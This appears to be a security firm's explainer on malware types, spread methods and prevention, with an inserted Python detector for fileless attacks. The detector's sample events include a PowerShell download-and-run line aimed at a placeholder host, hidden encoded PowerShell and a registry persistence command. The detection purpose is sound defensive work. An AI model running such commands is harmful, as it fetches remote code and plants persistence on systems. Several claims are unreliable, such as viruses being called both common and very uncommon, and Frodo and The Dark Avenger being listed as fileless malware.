Computers are machines driven by specific instruction sets governed by various rules and protocols known as operating systems. Just as the human body’s immune system is vulnerable to new viruses and their mutations, computers are prone to malware infections. This article covers the basics, the different types of malware and the ways malware attacks are carried out.
Malware on electronic devices can exploit software vulnerabilities and affect legitimate programs on the system. When it does, the result is often file damage and the loss of essential information held on the system.
If your organisation opts for regular penetration tests, you will have read about weaknesses in applications and networks and how modern malware exploits them. No matter how good the security products your organisation deploys, malware infections will remain a challenge unless people, processes and technology are addressed together. To quote the book ‘Information Retrieval’ by Stefan Büttcher, malicious pages deliberately posing as something that they are not in order to attract unwarranted attention of a commercial or other nature is known as spam.
Feel free to watch this video containing a condensed version of the article.
But first, let’s get the basics right.
What is Malware? Malware types and examples
Malware is a contraction of malicious software. It means computer programs or code deliberately created to cause harm to a computer, a network or its users. These programs can perform malicious tasks such as recording keystrokes, altering programs or settings, and stealing, deleting, modifying or encrypting sensitive and financial information. In short, malware refers to malicious code that can cause harm to systems or the data underlying them.
Malware history dates back to 1949, when the mathematician John von Neumann proposed a theory. With the dawning of a new century, malware has continued to evolve, with the fast-growing worldwide web offering novel and profitable opportunities to monetise it.
Malware is dynamic in the various ways it attacks a computer, network or server. It is built to invade a system so that cybercriminals can slip into the network at any convenient time. Malware launches its attack by taking charge of the host system and sending confidential information, images and intellectual property back to its original sender.
In the many years that have followed, malware authors have shown creativity in the kinds of malware they create. This has led to various types of attacks, including disabling victims’ access to data for a ransom and covertly collecting data on user activity.
Malware can be written using ordinary programming and scripting languages such as C/C++, Java, Python and PHP. You may not realise how simple it is to write a malicious program.
What are the different types of Malware? Examples of malware
The most common types of malware include computer viruses, computer worms, ransomware, keyloggers, Trojan horses and spyware. Others include fileless malware, adware, rootkits, bots, RAM scrapers and mobile malware. Malicious code is embedded in various forms of computer programs, mainly:
- ActiveX controls
- Java applets
- Pushed content
- Third-party library components
- Scripting languages
Computer viruses are one of the most common types of malware. When executed, they self-replicate by inserting their code into legitimate programs or host files. When this replication succeeds, the program or target file is now infected; think of it as a malicious code example. This makes viruses tricky to deal with because the malicious code runs through a legitimate program, and removing that program may affect the functioning of the underlying system. Antivirus or anti-malware software deals with this by quarantining, blocking or removing the infected file. Computer viruses are a very uncommon form of malware these days, and not all malware programs are viruses.
A computer worm is a self-replicating malicious program that spreads through a network by cloning itself. Simply clicking on a worm-infected email could spread the infection through an entire company. Computer worms originated in the 1990s, spreading by email; about a decade ago, worms arriving as email attachments routinely breached computer security measures.
Examples of computer worms include ILOVEYOU, SQL Slammer and Stuxnet. These worms do harmful things like overloading phone systems and disrupting television networks. Unlike viruses, they can spread without any end-user action. We have also written an article on famous computer worms and fun facts about them.
Ransomware is amongst the most common types of malware attacks these days, where files and users are locked out until a ransom is paid. It is a targeted approach aimed at controlling a target’s computer and locking software and files. The ransom attacker will ask for a payment to get files back and regain access to a computer. Supposedly, once they receive the payment, they will send a unique key to release it.
It is highly encouraged not to pay ransom demands though some businesses, including government organisations, have gone ahead to pay ransoms. Should you pay the ransom? There is no law around this, and it is something you should be thinking about in your security strategy.
Ransomware examples include RYUK, Locky, WannaCry and NotPetya. Most ransomware is delivered as a Trojan, propagated through social engineering (phishing, malicious USB drives, vishing, etc.). Once ransomware finds its way onto the target system, users’ files are encrypted within a few minutes. However, a few malware programs and potentially unwanted applications take a different approach, observing the user for some time (often hours) before commencing encryption.
Once ransomware has executed, its damage can be hard to undo without a robust backup. The best advice is to keep a robust offline backup of essential files on a separate hard drive that is immune to software vulnerabilities. An example is RobbinHood shutting down the city of Baltimore’s government networks, halting crucial activities such as tax collection, property transfers and government email. The cost of such ransomware incidents has run into millions of dollars.
Keyloggers monitor user keystrokes. Once installed, a keylogger can steal sensitive information such as passwords, user IDs and banking details. It is mainly used to steal information and monitor user activity. It can be introduced into a system through social engineering, phishing or malicious downloads from infected websites.
However, the media have also highlighted the controversial practice of some employers using keyloggers to monitor employee activity. Moreover, keylogger vendors are finding parents and guardians to be their primary customers.
An example keylogger is Olympic Vision (sold for less than $30), which was used against targets in Business Email Compromise (BEC) attacks. Using social engineering techniques, this campaign spear-phished specific targets to steal sensitive data.
This leads to the famous question:
Are keyloggers legal at work?
Yes, businesses do use them to monitor employee activity, although it is not a widespread practice. On personal computers, keyloggers may be installed only if you are the owner of the computer. It is illegal to use keyloggers for criminal purposes, and you should not use them on systems you are not authorised to monitor.
A Trojan horse disguises itself as legitimate software, tricking users into executing the malicious code hidden inside the program. A well-known example of a Trojan is Emotet. Trojan horses are propagated by social engineering via spam emails, and they have now replaced computer worms as the weapon of choice for cybercriminals.
Email is the most common way of targeting victims. A Trojan is either downloaded as an attachment by the unsuspecting user, or the user is redirected to an infected website. Fake anti-malware programs are the most prevalent type of Trojan.
Another type of Trojan prevalent among cybercriminals is the Remote Access Trojan (RAT). A RAT is a malicious program that provides a backdoor connection for its operators. These programs are installed after luring the victim into executing an email attachment or installing a new application or game. The new program installs and works normally while, behind the scenes, a backdoor connection gives its controllers unauthorised access.
Spyware is a type of malware that collects user activity and account information without the user’s knowledge. There are different kinds of spyware. Its use is not limited to cybercriminals; private organisations also use such programs to keep track of a user’s, device’s or computer’s activity. DarkHotel is an example of spyware that attacked business travellers through hotels’ in-house Wi-Fi networks.
An example here is Internet Security Essentials, which works like rogue antivirus software. It uses scare tactics and tricks the user into believing it is associated with Windows in order to make the user pay for malware/virus removal. When the computer is infected, the user sees a fake home screen designed to look as if it is part of Windows.
Though spyware may not be as destructive as other malware, the mechanism through which it reaches a computer is the same social engineering that other malware relies on; Trojans, for example, are also launched through social engineering. Users who detect a spyware program should know there is a weakness in the device that needs to be managed, usually by identifying and removing it with anti-virus or anti-malware tools. Spyware vs malware is not a contest, as spyware is simply malware designed to collect personal information.
A backdoor is a covert communication channel that bypasses authentication or other main functions of a program. As the name suggests, it is similar to a backdoor of a place that accepts visitors based on who has access to its whereabouts.
Manufacturers have included backdoors to help customers reset passwords or upgrade firmware when emergency access is needed. However, backdoors are generally not regarded as good software practice because of their secret nature.
Backdoors can be discovered or fall into the wrong hands, giving cybercriminals unfettered access to products. This provides easy ways to gain access to, modify or exfiltrate sensitive data, including PII.
Examples of some of the most famous backdoors:
- The Sercomm hardware backdoor in DSL routers, listening on port 32764
- PGP full-disk encryption backdoor
- Backdoors added into pirated copies of WordPress premium plug-ins
- Joomla plug-in backdoor
- The widely used open-source ProFTPD, which was backdoored back in 2010
The term fileless malware describes how it operates rather than what it does. Unlike typical malware, which infects new systems through files, fileless malware exploits and persists through operating system objects (registry keys, scheduled tasks or APIs) or lives in memory only. This type of malware comprises more than 50% of all malware.
Such APT attacks start by taking advantage of an existing legitimate program, being launched as one of its sub-processes. Another pathway is to employ legitimate tools already integrated into the operating system. Examples of fileless malware include Astaroth, Frodo and The Dark Avenger.
Fileless attacks are more difficult to detect because they piggyback on legitimate scripts, or are part of scripts that initiate communication with the attacker’s server-side endpoint. PowerShell has been particularly popular in fileless attacks due to its ability to run code directly from memory.
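As an added example (not code from the article or from Cyphere), here is a small Python detector that applies the indicators above to constructed process-creation events: PowerShell run from memory with encoded or hidden arguments, persistence through registry Run keys or scheduled tasks, and a legitimate Office program spawning an interpreter. The rule weights, alert threshold, event format and sample lines are all assumptions made for illustration.

```python
"""Added example (not from the article): a toy detector for the fileless
tradecraft described above, run over constructed process-creation events.
It flags PowerShell launched from memory (encoded/hidden), persistence via
registry Run keys or scheduled tasks, and Office apps spawning interpreters."""
import re

# (rule name, weight, pattern over the command line); weights are assumptions
CMDLINE_RULES = [
    ("encoded_command", 2, re.compile(r"(?i)\s-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}")),
    ("hidden_window", 1, re.compile(r"(?i)-w(indowstyle)?\s+hidden")),
    ("no_profile", 1, re.compile(r"(?i)-nop(rofile)?\b")),
    ("download_and_invoke", 3, re.compile(
        r"(?i)(iex|invoke-expression).*download(string|file)")),
    ("run_key_persistence", 2, re.compile(r"(?i)\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b")),
    ("schtask_persistence", 2, re.compile(r"(?i)\bschtasks(\.exe)?\s+/create\b")),
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
THRESHOLD = 3  # assumed: a single weak hint (e.g. -NoProfile alone) is not an alert

# Constructed event format: "<ts> parent=<exe> image=<exe> cmdline=<rest of line>"
EVENT_RX = re.compile(r"^(?P<ts>\S+)\s+parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline=(?P<cmdline>.*)$")

def score_event(parent, image, cmdline):
    """Return (score, matched rule names) for one process-creation event."""
    score, hits = 0, []
    for name, weight, rx in CMDLINE_RULES:
        if rx.search(cmdline):
            score += weight
            hits.append(name)
    # A legitimate program launching an interpreter as a sub-process (see text)
    if parent.lower() in OFFICE_PARENTS and image.lower() in INTERPRETERS:
        score += 2
        hits.append("office_spawns_interpreter")
    return score, hits

def flag_fileless(lines, threshold=THRESHOLD):
    """Parse each event line and return those whose score reaches the threshold."""
    flagged = []
    for line in lines:
        m = EVENT_RX.match(line)
        if not m:
            continue  # skip malformed lines rather than crash the pipeline
        ev = m.groupdict()
        score, hits = score_event(ev["parent"], ev["image"], ev["cmdline"])
        if score >= threshold:
            flagged.append({"ts": ev["ts"], "image": ev["image"], "score": score, "hits": hits})
    return flagged

# Constructed sample events; the base64 below is just "AAAA..." padding, not a payload
SAMPLE_EVENTS = [
    "2024-03-01T09:12:03Z parent=explorer.exe image=powershell.exe cmdline=powershell.exe Get-ChildItem C:\\Users",
    "2024-03-01T09:15:41Z parent=winword.exe image=powershell.exe cmdline=powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFB",
    "2024-03-01T10:40:09Z parent=cmd.exe image=reg.exe cmdline=reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Upd /d \"powershell.exe -w hidden -File C:\\Users\\Public\\u.ps1\"",
    "2024-03-01T11:02:17Z parent=excel.exe image=powershell.exe cmdline=powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')\"",
    "2024-03-01T12:00:00Z parent=services.exe image=powershell.exe cmdline=powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1",
]

if __name__ == "__main__":
    for hit in flag_fileless(SAMPLE_EVENTS):
        print(hit)
```

The benign admin script in the last sample scores 1 and is not flagged, which is why the weighted threshold matters: any single switch is common in legitimate automation, while several together, or an Office parent, are what the article's fileless description points to.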
Adware is malware that makes use of unsolicited advertising techniques. It appears in different forms, though the majority of adware is non-malicious in nature. Adware programs commonly redirect compromised users’ browser searches to similar web pages containing adverts for other products.
Examples of adware attacks include pop-up advertisements for products and ‘free’ applications packaged with adware. A real-life example of adware is Fireball, which has infected over 250 million computers globally; its main abilities are to run code, download malware and hijack victims’ internet traffic to generate advertising revenue.
Malvertising, or malicious advertising, uses online advertisements as the main route to infect systems and spread malware. Generally, this occurs through the injection of unwanted or malicious code into ads, using legitimate adverts or advert networks to deliver malware to target computers secretly. One example of malvertising is cybercriminals paying to place a malicious advert on a legitimate website; an unsuspecting user clicking that ad can end up with malware installed on their PC. One of the most notorious names here is the Angler Exploit Kit.
Other cases occur through drive-by downloads, when malware in an advert executes automatically without the user performing any action. Malvertising has proven lucrative for cybercriminals, as it lets them spread other malware (like ransomware or banking Trojans) to unsuspecting users.
Rootkits are a type of malware that enable unauthorised access to a computer system without being detected. The most distinguishing feature of a rootkit is its ability to run at the operating system level. This amounts to handing complete control of the system, i.e. administrative privileges, to the rootkit’s operators (attackers).
Rootkits spread in different ways, such as malicious downloads, compromised shared devices, malicious attachments and phishing. They can also be embedded in applications, kernels, boot records, virtual machines or firmware, and can serve as a hideout for other malware (like keyloggers). An example of a rootkit is Zacinlo, which infects systems when users unknowingly download a fake VPN app.
Bots/botnets are essentially a combination of Trojans, viruses and worms that perform automated tasks on command. They can be used for good, such as indexing search engines. Still, when used with malicious intent, they evolve into self-propagating malware with the ability to connect back to a central server.
What type of malware can have multiple control servers distributed all over the world with multiple fallback options?
A botnet is a remotely controlled network of bots used to launch large-scale attacks such as DDoS. An example of a botnet is Echobot, a variant of the well-known Mirai, which exploited insecure IoT devices and other systems to join an attacker-controlled botnet used for further large-scale network attacks.
Malware affecting mobile devices is as diverse as that targeting computers, including mobile ransomware, spyware, Trojans and madware. Madware is aggressive advertising targeting smartphones and tablets.
Mobile malware can be distributed in multiple ways, such as phishing and malicious application downloads. Jailbroken phones are increasingly vulnerable to such attacks, as they lack the default protective features of the device’s original operating system. An example is Triada, a modular Android mobile Trojan that uses root privileges to replace files and change configuration settings.
As the name suggests, RAM scrapers mine data temporarily stored in memory, or RAM (Random Access Memory). They target point-of-sale systems such as cash registers, because such systems hold unencrypted credit card numbers in memory for a short time before encrypting them and passing them to the back end.
What is nagware?
Nagware is a type of software that displays annoying messages to users, typically asking for payment or registration. The name “nagware” is a play on the word “nag”, meaning “to annoy”.
Some nagware is more benign, simply showing reminders or advertisements. More aggressive nagware may disable software features or even prevent it from running altogether.
Nagware is considered a less ethical way of marketing software than shareware, allowing users to try the software before paying for it. However, some argue that nagware is a more honest approach since it doesn’t try to hide the fact that the user will eventually have to pay for the software.
There is a fine line between nagware and malware, as some programs that display nag messages may also install other unwanted software or make changes to the system without the user’s knowledge or consent. For this reason, it’s essential to be careful when downloading and installing any software, even if it’s free.
How does malware attack and spread?
The following are the most common techniques by which malware spreads.
- Vulnerabilities: Malware takes advantage of weaknesses in a system, network or hardware component to gain access and perform further tasks as instructed by attackers. Sometimes the initial access gained lacks the higher privileges, such as administrator or root-equivalent access, needed to modify programs and settings. A threat actor then uses privilege escalation techniques, such as fileless PowerShell attacks, to gain full control.
- Backdoors: A secret entry route into hardware, software or networks, left there either intentionally or unintentionally.
- Drive-by downloads: Malicious downloads executed without the user’s knowledge, either by visiting infected websites or by opening email attachments.
- Flat networks: Organisations with flat network topology without internal firewalling or similar segregations to control traffic flows. Lack of a defence-in-depth approach towards security offers an easier route for malware infections across their network.
- Hybrid threats: Multiple characteristics of common forms of malware are sometimes combined to evade detection mechanisms and maintain a long term foothold on the victim computers.
How to prevent malware attacks?
Depending on the infection, it may or may not be easy to identify and prevent a malware attack. In the case of a traditional Trojan, virus, worm or similar program, it may not be difficult to find the running programs and reconstruct the processes and events to figure out what happened. However, fileless malware attacks are making attacks much harder to identify.
Preventing malware attacks requires multiple action items on your list:
- Patch management
- Office macros protection
- Vulnerability management
- Secure configuration baselines
- Secure remote access
- User education
- Multi-factor authentication on external and business-critical assets
- Endpoint protection
- Segregation at user, network and environment levels
- Web and email filtering
- Logging and monitoring controls
- Regular backups and test backup restore
How can Cyphere help you?
Cyphere helps businesses protect their most prized assets from unauthorised access. Cyphere offers technical security assessments, managed services, data privacy and threat intel services. Through IT health checks and third-party validation assessments such as web application and network penetration tests, businesses can find unknown risks and gaps in their IT security strategies. All deliverables include thorough reporting of risks and impact, probability and recommendations towards a risk remediation plan.
Get in touch to discuss your security concerns or for a free quote for our services.
Harman Singh is a security professional with over 15 years of consulting experience in both public and private sectors.
As the Managing Consultant at Cyphere, he provides cyber security services to retailers, fintech companies, SaaS providers, housing and social care, construction and more. Harman specialises in technical risk assessments, penetration testing and security strategy.
He regularly speaks at industry events, has been a trainer at prestigious conferences such as Black Hat and shares his expertise on topics such as ‘less is more’ when it comes to cybersecurity. He is a strong advocate for ensuring cyber security as an enabler for business growth.
In addition to his consultancy work, Harman is an active blogger and author who has written articles for Infosecurity Magazine, VentureBeat and other websites.